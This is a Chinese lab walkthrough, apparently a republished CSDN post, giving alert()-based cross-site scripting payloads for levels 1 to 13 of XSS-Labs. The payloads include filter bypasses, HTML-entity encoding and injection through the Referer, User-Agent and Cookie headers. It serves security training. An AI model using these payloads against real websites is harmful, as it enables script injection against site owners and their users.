XSS注入实例-XSS-Labs

发布时间:2024年01月20日

文章目录

XSS-labs

level1

<script>alert('xss')</script>

在这里插入图片描述

level2

"><script>alert('xss')</script>

在这里插入图片描述

level3

'onclick=alert('xss') >

在这里插入图片描述

level4

"onclick=alert=alert('xss') >

在这里插入图片描述

level5

"><a href=alert('xss')> xss</a>(错误)

"><a href=javascript:alert(/xss/)> xss</a>(正确)

在这里插入图片描述

level6

<a HrEf=javascript:alert('xss')>xss</a>

在这里插入图片描述

level7

oonnclick=javasscriptcript:alert('xss')>(无效)
"><a HRhrefeF="javascrscriptipt:alert('xss')"> xss</a>

在这里插入图片描述

level8

javascript:alert('xss')
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;

ASCIl 转 Unicode
https://www.bejson.com/
https://www.matools.com/code-convert-unicode
在这里插入图片描述

level9

javascript:alert()
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

level10

?t_sort=" onfocus=javascript:alert() type="text

在这里插入图片描述

level11

referer:" type='text' onclick='alert(1)'

在这里插入图片描述

在这里插入图片描述

level12

User-Agent:"type='text' onclick='alert(1)'

在这里插入图片描述
在这里插入图片描述

level13

Cookie: user=" type="text" onclick="alert('XSS')

在这里插入图片描述
在这里插入图片描述

文章来源:https://blog.csdn.net/weixin_62715196/article/details/135702762
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
最新文章